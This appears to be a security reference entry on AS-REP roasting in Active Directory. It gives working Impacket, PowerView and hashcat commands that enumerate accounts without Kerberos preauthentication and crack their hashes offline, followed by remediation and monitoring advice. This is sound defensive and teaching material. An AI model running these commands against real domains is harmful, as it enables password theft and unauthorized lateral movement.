AS-REP Roasting

Description

AS‑REP roasting targets users with “Do not require Kerberos preauthentication” enabled. Attackers can request AS‑REP messages for those users without knowing any password. The domain controller returns data encrypted with the user’s key (derived from the user’s password), which can be cracked offline to recover the password. This commonly affects legacy/service accounts created for compatibility or troubleshooting and never remediated.

Examples

Enumerate Vulnerable Users and Request AS‑REPs

Use Impacket to pull AS‑REP hashes for users with pre‑auth disabled:

GetNPUsers.py corp.local/ -dc-ip 10.0.0.10 -no-pass -usersfile users.txt -format hashcat > asrep_hashes.txt

The output contains $krb5asrep$ hashes suitable for cracking.

Enumerate with PowerView/native tooling:

# PowerView
Get-DomainUser -PreauthNotRequired | Select SamAccountName, userAccountControl

# Native AD module
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth | Select SamAccountName

Crack AS‑REP Hashes

Crack with hashcat (mode 18200 for etype 23):

hashcat -m 18200 asrep_hashes.txt wordlists/best64.txt --username

Recovered credentials confirm exploitability and often unlock lateral movement paths.

Remediation

1. Re‑enable Kerberos preauthentication
   • Audit and clear the DONT_REQ_PREAUTH flag on all users.
   • Create alerts for changes to this flag; there are very few legitimate cases.
2. Reduce blast radius of exposed accounts
   • Rotate passwords immediately and remove excessive privileges.
   • Migrate legacy services to gMSA/MSA or application identities.
3. Monitor and hunt
   • Watch 4768 for pre‑auth disabled requests, especially from unusual IPs.
   • Seed honeypot users with the flag enabled to catch reconnaissance.